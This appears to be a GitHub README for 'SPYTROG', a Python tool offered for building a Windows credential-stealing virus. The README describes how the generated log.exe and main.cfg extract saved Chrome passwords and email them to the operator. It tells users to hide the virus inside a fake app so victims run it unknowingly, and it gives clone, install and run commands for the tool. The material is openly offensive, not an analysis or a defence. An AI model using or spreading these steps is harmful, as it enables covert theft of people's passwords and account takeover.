7AXEL / SPYTROG

tool to create a spy virus for windows os

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

SPYTROG

  • spytrog tool is used to create windows virus
  • this virus will retrive all chrome saved password from the target pc
  • to use it just install and run it and select 1 to build virus then enter your email adress and the tool will creat a zip file wish contain the virus log.exe and a config file main.cfg , note that this config file is used by the virus
  • then you can build a fake app and include this virus in it by extracting the zip file in your app files and make your builten app run the virus when she is in execution
  • when the virus was runned he will retrive chrome password from the pc who she is was runned into and he will send those password to your email in the spam section

INSTALLATION

  • Windows
  • 1 download and install git for window from the original git website download

  • 2 download and install python3 from the original python website download

  • 3 start the git shell and run this commands:

git clone https://github.com/7AXEL/SPYTROG
  • Linux
  • open the terminal and write those commands:

apt update & apt upgrade -y
apt install git python
git clone https://github.com/7AXEL/SPYTROG

RUN

  • Window & Linux
cd SPYTROG
python spytrog.py

PLATFORMS

Supported Platform : Windows, Ubuntu/Debian/Kali/Parrot/Arch Linux
Virus target platform : Windows


About

tool to create a spy virus for windows os

License:GNU General Public License v3.0


Languages

Language:Python 100.0%